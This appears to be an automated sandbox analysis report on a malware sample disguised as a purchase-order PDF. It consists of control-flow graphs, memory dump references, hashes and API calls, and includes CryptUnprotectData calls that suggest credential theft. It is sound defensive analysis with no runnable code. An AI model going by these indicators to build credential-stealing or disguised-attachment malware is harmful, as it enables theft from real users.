45065->45067 45068 35e60a18 GetCurrentThread 45065->45068 45067->45068 45069 35e60a55 GetCurrentProcess 45068->45069 45070 35e60a4e 45068->45070 45071 35e60a8b 45069->45071 45070->45069 45076 35e60b61 45071->45076 45079 35e60f41 45071->45079 45072 35e60ab3 GetCurrentThreadId 45073 35e60ae4 45072->45073 45073->45058 45081 35e60bc8 DuplicateHandle 45076->45081 45080 35e60f4e 45079->45080 45080->45072 45082 35e60b8e 45081->45082 45082->45072 45084 35e6193f 45083->45084 45085 35e62e79 45084->45085 45090 35e62ed4 45084->45090 45093 35e63e40 45084->45093 45086 35e62ea9 45085->45086 45088 35e62ac4 6 API calls 45085->45088 45086->45090 45097 35e62ac4 45086->45097 45088->45086 45089 35e62ec1 45103 35e6d608 45089->45103 45094 35e63e61 45093->45094 45095 35e63e85 45094->45095 45110 35e63ff0 45094->45110 45095->45085 45099 35e62acf 45097->45099 45098 35e6d0a1 45098->45089 45099->45098 45100 35e60938 5 API calls 45099->45100 45101 35e6d0bb 45100->45101 45135 35e6c544 45101->45135 45109 35e6d66d 45103->45109 45104 35e6d899 45105 35e60938 5 API calls 45104->45105 45107 35e6d6ba 45105->45107 45106 35e6dad0 WaitMessage 45106->45109 45107->45090 45109->45104 45109->45106 45109->45107 45142 35e6c60c 45109->45142 45112 35e63ffd 45110->45112 45111 35e60938 5 API calls 45113 35e6402b 45111->45113 45112->45111 45114 35e64036 45113->45114 45116 35e62bec 45113->45116 45114->45095 45118 35e62bf7 45116->45118 45117 35e640a8 45118->45117 45120 35e62c20 45118->45120 45121 35e62c2b 45120->45121 45126 35e62c30 45121->45126 45123 35e64517 45130 35e691f0 45123->45130 45129 35e62c3b 45126->45129 45127 35e657a0 45127->45123 45128 35e63e40 7 API calls 45128->45127 45129->45127 45129->45128 45132 35e69321 45130->45132 45133 35e69221 45130->45133 45131 35e64551 45131->45117 45133->45131 45134 3593fab0 2 API calls 45133->45134 45134->45132 45136 35e6c54f 45135->45136 45137 35e6d3bb 45136->45137 45139 35e6c560 45136->45139 45137->45098 45140 35e6d3f0 OleInitialize 45139->45140 45141 35e6d454 45140->45141 45141->45137 45143 35e6e708 DispatchMessageW 45142->45143 45144 35e6e774 45143->45144 45144->45109

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 142 35e6d608-35e6d66b 143 35e6d66d-35e6d697 142->143 144 35e6d69a-35e6d6b8 142->144 143->144 149 35e6d6c1-35e6d6f8 144->149 150 35e6d6ba-35e6d6bc 144->150 154 35e6d6fe-35e6d712 149->154 155 35e6db29 149->155 151 35e6db7a-35e6db8f 150->151 156 35e6d714-35e6d73e 154->156 157 35e6d741-35e6d760 154->157 158 35e6db2e-35e6db44 155->158 156->157 164 35e6d762-35e6d768 157->164 165 35e6d778-35e6d77a 157->165 158->151 166 35e6d76c-35e6d76e 164->166 167 35e6d76a 164->167 168 35e6d77c-35e6d794 165->168 169 35e6d799-35e6d7a2 165->169 166->165 167->165 168->158 171 35e6d7aa-35e6d7b1 169->171 172 35e6d7b3-35e6d7b9 171->172 173 35e6d7bb-35e6d7c2 171->173 174 35e6d7cf-35e6d7ec call 35e6c5c0 172->174 175 35e6d7c4-35e6d7ca 173->175 176 35e6d7cc 173->176 179 35e6d7f2-35e6d7f9 174->179 180 35e6d941-35e6d945 174->180 175->174 176->174 179->155 181 35e6d7ff-35e6d83c 179->181 182 35e6db14-35e6db27 180->182 183 35e6d94b-35e6d94f 180->183 191 35e6d842-35e6d847 181->191 192 35e6db0a-35e6db0e 181->192 182->158 184 35e6d951-35e6d964 183->184 185 35e6d969-35e6d972 183->185 184->158 187 35e6d974-35e6d99e 185->187 188 35e6d9a1-35e6d9a8 185->188 187->188 189 35e6da47-35e6da5c 188->189 190 35e6d9ae-35e6d9b5 188->190 189->192 202 35e6da62-35e6da64 189->202 193 35e6d9b7-35e6d9e1 190->193 194 35e6d9e4-35e6da06 190->194 195 35e6d879-35e6d88e call 35e6c5e4 191->195 196 35e6d849-35e6d857 call 35e6c5cc 191->196 192->171 192->182 193->194 194->189 231 35e6da08-35e6da12 194->231 206 35e6d893-35e6d897 195->206 196->195 211 35e6d859-35e6d877 call 35e6c5d8 196->211 209 35e6da66-35e6da9f 202->209 210 35e6dab1-35e6dace call 35e6c5c0 202->210 207 35e6d908-35e6d915 206->207 208 35e6d899-35e6d8ab call 35e60938 call 35e6c5f0 206->208 207->192 229 35e6d91b-35e6d925 call 35e6c600 207->229 236 35e6d8ad-35e6d8dd 208->236 237 35e6d8eb-35e6d903 208->237 225 35e6daa1-35e6daa7 209->225 226 35e6daa8-35e6daaf 209->226 210->192 228 35e6dad0-35e6dafc WaitMessage 210->228 211->206 225->226 226->192 233 35e6db03 228->233 234 35e6dafe 228->234 239 35e6d927-35e6d92a call 35e6c60c 229->239 240 35e6d934-35e6d93c call 35e6c618 229->240 244 35e6da14-35e6da1a 231->244 245 35e6da2a-35e6da45 231->245 233->192 234->233 251 35e6d8e4 236->251 252 35e6d8df 236->252 237->158 247 35e6d92f 239->247 240->192 249 35e6da1e-35e6da20 244->249 250 35e6da1c 244->250 245->189 245->231 247->192 249->245 250->245 251->237 252->251
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DispatchMessage
                                                                                                                                    • String ID: $z5$$z5$$z5$$z5
                                                                                                                                    • API String ID: 2061451462-75759260
                                                                                                                                    • Opcode ID: 681114992fe35085b5f19276b20c2c8c94459f8e44663e263ac5e41c6a309e52
                                                                                                                                    • Instruction ID: f35d2ba97c597c03df956bd0af93310254b146bcc640d10cb2d6491d56875c08
                                                                                                                                    • Opcode Fuzzy Hash: 681114992fe35085b5f19276b20c2c8c94459f8e44663e263ac5e41c6a309e52
                                                                                                                                    • Instruction Fuzzy Hash: 85F16B34A403098FEB04DFA9CA44B9DBBF2FF88348F568559D409AB265DB74A945CF80

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 352 155f90-155fc6 353 155fce-155fd4 352->353 483 155fc8 call 155f90 352->483 484 155fc8 call 1560e0 352->484 485 155fc8 call 155968 352->485 354 156024-156028 353->354 355 155fd6-155fda 353->355 356 15603f-156053 354->356 357 15602a-156039 354->357 358 155fdc-155fe1 355->358 359 155fe9-155ff0 355->359 362 15605b-156062 356->362 480 156055 call 158d90 356->480 481 156055 call 158da0 356->481 482 156055 call 1590a8 356->482 360 156065-15606f 357->360 361 15603b-15603d 357->361 358->359 363 1560c6-156103 359->363 364 155ff6-155ffd 359->364 366 156071-156077 360->366 367 156079-15607d 360->367 361->362 374 156105-15610b 363->374 375 15610e-15612e 363->375 364->354 365 155fff-156003 364->365 370 156005-15600a 365->370 371 156012-156019 365->371 368 156085-1560bf 366->368 367->368 369 15607f 367->369 368->363 369->368 370->371 371->363 373 15601f-156022 371->373 373->362 374->375 380 156135-15613c 375->380 381 156130 375->381 384 15613e-156149 380->384 383 1564c4-1564cd 381->383 385 1564d5-156511 384->385 386 15614f-156162 384->386 396 156513-156518 385->396 397 15651a-15651e 385->397 391 156164-156172 386->391 392 156178-156193 386->392 391->392 401 15644c-156453 391->401 399 156195-15619b 392->399 400 1561b7-1561ba 392->400 398 156524-156525 396->398 397->398 402 1561a4-1561a7 399->402 403 15619d 399->403 405 156314-15631a 400->405 406 1561c0-1561c3 400->406 401->383 404 156455-156457 401->404 408 1561da-1561e0 402->408 409 1561a9-1561ac 402->409 403->402 403->405 407 156406-156409 403->407 403->408 410 156466-15646c 404->410 411 156459-15645e 404->411 405->407 412 156320-156325 405->412 406->405 413 1561c9-1561cf 406->413 418 1564d0 407->418 419 15640f-156415 407->419 420 1561e6-1561e8 408->420 421 1561e2-1561e4 408->421 414 156246-15624c 409->414 415 1561b2 409->415 410->385 416 15646e-156473 410->416 411->410 412->407 413->405 417 1561d5 413->417 414->407 424 156252-156258 414->424 415->407 422 156475-15647a 416->422 423 1564b8-1564bb 416->423 417->407 418->385 425 156417-15641f 419->425 426 15643a-15643e 419->426 427 1561f2-1561fb 420->427 421->427 422->418 432 15647c 422->432 423->418 431 1564bd-1564c2 423->431 433 15625e-156260 424->433 434 15625a-15625c 424->434 425->385 435 156425-156434 425->435 426->401 430 156440-156446 426->430 428 1561fd-156208 427->428 429 15620e-156236 427->429 428->407 428->429 455 15623c-156241 429->455 456 15632a-156360 429->456 430->384 430->401 431->383 431->404 436 156483-156488 432->436 437 15626a-156281 433->437 434->437 435->392 435->426 441 1564aa-1564ac 436->441 442 15648a-15648c 436->442 448 156283-15629c 437->448 449 1562ac-1562d3 437->449 441->418 444 1564ae-1564b1 441->444 445 15648e-156493 442->445 446 15649b-1564a1 442->446 444->423 445->446 446->385 447 1564a3-1564a8 446->447 447->441 451 15647e-156481 447->451 448->456 459 1562a2-1562a7 448->459 449->418 461 1562d9-1562dc 449->461 451->418 451->436 455->456 462 156362-156366 456->462 463 15636d-156375 456->463 459->456 461->418 464 1562e2-15630b 461->464 465 156385-156389 462->465 466 156368-15636b 462->466 463->418 467 15637b-156380 463->467 464->456 479 15630d-156312 464->479 469 1563a8-1563ac 465->469 470 15638b-156391 465->470 466->463 466->465 467->407 472 1563b6-1563d5 call 1566b8 469->472 473 1563ae-1563b4 469->473 470->469 471 156393-15639b 470->471 471->418 475 1563a1-1563a6 471->475 476 1563db-1563df 472->476 473->472 473->476 475->407 476->407 477 1563e1-1563fd 476->477 477->407 479->456 480->362 481->362 482->362 483->353 484->353 485->353
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o]q$(o]q$(o]q$,aq$,aq
                                                                                                                                    • API String ID: 0-615190528
                                                                                                                                    • Opcode ID: bc13a57fa26e9cfeaf755ab4a6756a31ca2a99feb138b930c136acfdfec268c3
                                                                                                                                    • Instruction ID: 7ea2a7f911bba4f3c4f10d801b20c73abec5fa83233f1d41b6dd51290fcc4914
                                                                                                                                    • Opcode Fuzzy Hash: bc13a57fa26e9cfeaf755ab4a6756a31ca2a99feb138b930c136acfdfec268c3
                                                                                                                                    • Instruction Fuzzy Hash: 3F124030A00219DFCB15CF69C994AADBBF2FF88316F958059E825DB261D734DD89CB90
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o]q$4']q$4']q$4']q
                                                                                                                                    • API String ID: 0-875651895
                                                                                                                                    • Opcode ID: 516335f7ac709f1c575618f193f828fd4b170c0ba6ac0f16a9446667db009da0
                                                                                                                                    • Instruction ID: 104f71f553c65b6cbe201ede95457fbb4040d27ecad5aa398fa09fd509b5baa5
                                                                                                                                    • Opcode Fuzzy Hash: 516335f7ac709f1c575618f193f828fd4b170c0ba6ac0f16a9446667db009da0
                                                                                                                                    • Instruction Fuzzy Hash: B3A26D70A04209DFCB15CF68C994AAEBBB2BF88301F158569E8159F261D734ED89CB61
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o]q$Haq
                                                                                                                                    • API String ID: 0-903699183
                                                                                                                                    • Opcode ID: 6ccf031582ce65ce29f3e9211371cd801b31dbc6ad282d87e1c46a30f3a3752c
                                                                                                                                    • Instruction ID: 98dcc8a690e99f6d91cc3bdaa3bdaf488ca7e03057d70c567cbe132ac33ef1f9
                                                                                                                                    • Opcode Fuzzy Hash: 6ccf031582ce65ce29f3e9211371cd801b31dbc6ad282d87e1c46a30f3a3752c
                                                                                                                                    • Instruction Fuzzy Hash: 45129E70A00619CFCB14DFA9C854AAEBBF7BF88301F108569E859DB391DB349D85CB90

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 2169 154328-154368 2171 15436f-15444c call 153168 call 152c88 2169->2171 2172 15436a 2169->2172 2182 154453-154471 2171->2182 2183 15444e 2171->2183 2172->2171 2213 154474 call 154620 2182->2213 2214 154474 call 15461d 2182->2214 2183->2182 2184 15447a-154485 2185 154487 2184->2185 2186 15448c-154490 2184->2186 2185->2186 2187 154495-15449c 2186->2187 2188 154492-154493 2186->2188 2189 1544a3-1544b1 2187->2189 2190 15449e 2187->2190 2191 1544b4-1544f8 2188->2191 2189->2191 2190->2189 2195 15455e-154575 2191->2195 2197 154577-15459c 2195->2197 2198 1544fa-154510 2195->2198 2205 1545b4 2197->2205 2206 15459e-1545b3 2197->2206 2202 154512-15451e 2198->2202 2203 15453a 2198->2203 2207 154520-154526 2202->2207 2208 154528-15452e 2202->2208 2204 154540-15455d 2203->2204 2204->2195 2206->2205 2209 154538 2207->2209 2208->2209 2209->2204 2213->2184 2214->2184
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3289424698.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_150000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: PH]q$PH]q
                                                                                                                                    • API String ID: 0-1166926398
                                                                                                                                    • Opcode ID: 1a4caca6111ba48326f6b8d445958757ad9cf8be90386eafd3e8cea34f24297a
                                                                                                                                    • Instruction ID: 12e19b6e2dbd3945cba91068f3c605155e267b21e760cf66af840185694b3005
                                                                                                                                    • Opcode Fuzzy Hash: 1a4caca6111ba48326f6b8d445958757ad9cf8be90386eafd3e8cea34f24297a
                                                                                                                                    • Instruction Fuzzy Hash: BB91E374E00258CFDB18DFA9D884A9DBBF2FF89305F148069E818AB365DB349985CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314608165.0000000035E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 35E60000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35e60000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te]q
                                                                                                                                    • API String ID: 0-52440209
                                                                                                                                    • Opcode ID: 6c66eb0aacc18fc346329edfb0e01d92570f7bee84f6043d438434fb7bc78233
                                                                                                                                    • Instruction ID: aa6525bcbaaec1caa32a5eb53eb7f6f52a97b9ddf86b74978a52caedc7c20801
                                                                                                                                    • Opcode Fuzzy Hash: 6c66eb0aacc18fc346329edfb0e01d92570f7bee84f6043d438434fb7bc78233
                                                                                                                                    • Instruction Fuzzy Hash: 2182C274A40228CFDB25DF64C994BADB7B2FF89300F1085A9D809A7765CB359E82CF50
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: Te]q
                                                                                                                                    • API String ID: 0-52440209
                                                                                                                                    • Opcode ID: 7b148ef216b1ef1e85e35bb596ef7099441477f65e4e641074879f0e59354a80
                                                                                                                                    • Instruction ID: efaf782cf1da1e760fe8f68322aa68935666f124583b0f44fe5321e368cc3a93
                                                                                                                                    • Opcode Fuzzy Hash: 7b148ef216b1ef1e85e35bb596ef7099441477f65e4e641074879f0e59354a80
                                                                                                                                    • Instruction Fuzzy Hash: 1172D374A01228CFDB25DF64C994B9DBBB6FF89300F1084A9D809A7765CB359E82CF54
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(00000092,?,00000000,?,?,?,?), ref: 32B3DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: 3521f3ade7ff56672ed1501af30247c28f73b28fe0a892f24bc06538877ef337
                                                                                                                                    • Instruction ID: 5499dbf27c00ecf8a0db5774e414468bba35f07eb310afaca09b53fc2f918fed
                                                                                                                                    • Opcode Fuzzy Hash: 3521f3ade7ff56672ed1501af30247c28f73b28fe0a892f24bc06538877ef337
                                                                                                                                    • Instruction Fuzzy Hash: 3C1144B68003499FCB10CF99C945BEEBBF4EB48320F148419EA18A7210C739A950DFA1
                                                                                                                                    APIs
                                                                                                                                    • CryptUnprotectData.CRYPT32(00000092,?,00000000,?,?,?,?), ref: 32B3DA45
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CryptDataUnprotect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 834300711-0
                                                                                                                                    • Opcode ID: afee96a4e59a71d286ce03bda2ac09b364c99bfe1542e9701e2f9fd2b64d4929
                                                                                                                                    • Instruction ID: 2d12b88ceeadcfbe4bb91ea0b68d13c1db9cee9201f8b09500f92cb93b4114ca
                                                                                                                                    • Opcode Fuzzy Hash: afee96a4e59a71d286ce03bda2ac09b364c99bfe1542e9701e2f9fd2b64d4929
                                                                                                                                    • Instruction Fuzzy Hash: 6A1134B6800249DFCB10CF99CA45BDEBFF5EF48320F148419EA68A7210D739A590DFA1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 50f992ffeef000b96502614ec3eb09041e4f3e933af00270802b9dc1075ae6c1
                                                                                                                                    • Instruction ID: 91e73930cd2f1e98a59eb75bec4756d520deca54aa4cb5dc15ba21afa83570f9
                                                                                                                                    • Opcode Fuzzy Hash: 50f992ffeef000b96502614ec3eb09041e4f3e933af00270802b9dc1075ae6c1
                                                                                                                                    • Instruction Fuzzy Hash: CC72CC74E02229CFDB65DF69C985BD9BBB2BF49301F5081E9D409A7251DB34AE82CF40
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 20e5053ddff3c3caf9aa5b6970bdb26ec299b00355ad619c0e4b7bfaa135abac
                                                                                                                                    • Instruction ID: 98924bb54300b81be2dd4b8e6ca2f940b9e7f7d89db3f200e10154017d31426f
                                                                                                                                    • Opcode Fuzzy Hash: 20e5053ddff3c3caf9aa5b6970bdb26ec299b00355ad619c0e4b7bfaa135abac
                                                                                                                                    • Instruction Fuzzy Hash: 75E1E174E01218CFEB15DFA5C944B9DBBB2FF89304F2081A9D908BB291DB755A85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 786f10bfdb4b55afca9b93f36109e4633b455642b5eaeca56542a7f638390594
                                                                                                                                    • Instruction ID: cf19124ae8bc05ebb083b98e2b0b6a8b545de25c2533b630b2ab16805747e2fa
                                                                                                                                    • Opcode Fuzzy Hash: 786f10bfdb4b55afca9b93f36109e4633b455642b5eaeca56542a7f638390594
                                                                                                                                    • Instruction Fuzzy Hash: 3ED1BF74E01218CFDB14DFA5C994B9DBBB2FF88300F1084A9D809AB365DB359A86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 031a45994c67a69ba1872a29c3b98620862df2dbd705d84862904f77d79876f3
                                                                                                                                    • Instruction ID: ca34e3404919c9802ff551011ca60024676ec09903148494a82f427a93a2bfbe
                                                                                                                                    • Opcode Fuzzy Hash: 031a45994c67a69ba1872a29c3b98620862df2dbd705d84862904f77d79876f3
                                                                                                                                    • Instruction Fuzzy Hash: E7A12470E01218CFEB11DFA8C984BDDBBB1FF88304F208669E448AB291DB759985CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8f64465c18b54795278da505a64cf71e8b5fd0b46c80e074ed8de0d3e59949cb
                                                                                                                                    • Instruction ID: 8384b59ee357fea51f0af5f03b4b9ad54a1081cb74bd4bc7fad66f6251357d1e
                                                                                                                                    • Opcode Fuzzy Hash: 8f64465c18b54795278da505a64cf71e8b5fd0b46c80e074ed8de0d3e59949cb
                                                                                                                                    • Instruction Fuzzy Hash: 4BA11470D01218CFEB14DFA8C984BDDBBB1FF88304F208669E548A72A1DB759985CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5ad206148263cdb862c658dee888fa2abdee7ab3703a855a5e4c0e1a0406a744
                                                                                                                                    • Instruction ID: f24f98d1d855f21ac15b351d937a1be6109db970c6c0a2ecf0b42a30c9cf9228
                                                                                                                                    • Opcode Fuzzy Hash: 5ad206148263cdb862c658dee888fa2abdee7ab3703a855a5e4c0e1a0406a744
                                                                                                                                    • Instruction Fuzzy Hash: F5A1A0B4E01228CFEB24CF6AC945B9DBBF2BF89300F14C1AAD409A7251DB745A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ce6fe965da4489a8e74469b842bbd59cd1e3e249f8330519f0abc736299f984f
                                                                                                                                    • Instruction ID: d9938008c35da45df1f53d7f8ca8ff3b0d00631e678c2a5e0e20eb39692ad86d
                                                                                                                                    • Opcode Fuzzy Hash: ce6fe965da4489a8e74469b842bbd59cd1e3e249f8330519f0abc736299f984f
                                                                                                                                    • Instruction Fuzzy Hash: C3A19FB5E01228CFEB24CF6AC945B9DBBF2BB89300F10C1AAD409A7255DB745A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e6e284b8074bd2f6047eccbedd0b3617e9dc5261789839d5f96222acb4c1dd0a
                                                                                                                                    • Instruction ID: 3cc8602b04c281a068c6918d3e210156d336452baed5a0eef0ff750315e67e56
                                                                                                                                    • Opcode Fuzzy Hash: e6e284b8074bd2f6047eccbedd0b3617e9dc5261789839d5f96222acb4c1dd0a
                                                                                                                                    • Instruction Fuzzy Hash: B6A1A1B4E01218CFEB28CF6AC945B9DBBF6BF89300F14C1AAD409A7251DB345A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_35930000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bb6ad89ab126780f1c4ab531a2a21f93bb1546e90c7639edb6c9867da1c96580
                                                                                                                                    • Instruction ID: 6b8cdd08e18bb023561e33a9663a7cf3b943999e1a0846038369c9771c7e73e8
                                                                                                                                    • Opcode Fuzzy Hash: bb6ad89ab126780f1c4ab531a2a21f93bb1546e90c7639edb6c9867da1c96580
                                                                                                                                    • Instruction Fuzzy Hash: C8A180B4E01218CFEB24CF6AC945B9DBBF2BF89300F14C1AAD409A7255DB345A85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3312198563.0000000032B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 32B30000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_3_2_32b30000_PURCHASE ORDER TRC-090971819130-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c396848d6b0d989b81eee89280dd9b7e515ab683ae3c6e38d4b28594b7b3b91b
                                                                                                                                    • Instruction ID: 112037c0883ee3f208682bfd0233eef9f2c05a99144508fecb4315ee661880a1
                                                                                                                                    • Opcode Fuzzy Hash: c396848d6b0d989b81eee89280dd9b7e515ab683ae3c6e38d4b28594b7b3b91b
                                                                                                                                    • Instruction Fuzzy Hash: 9191F074D01218CFEB10DFA8C984B9CBBB1FF49305F2096A9E549BB291DB759981CF14
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000003.00000002.3314424712.0000000035930000.00000040.00000800.00020000.00000000.sdmp, Offset: 35930000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
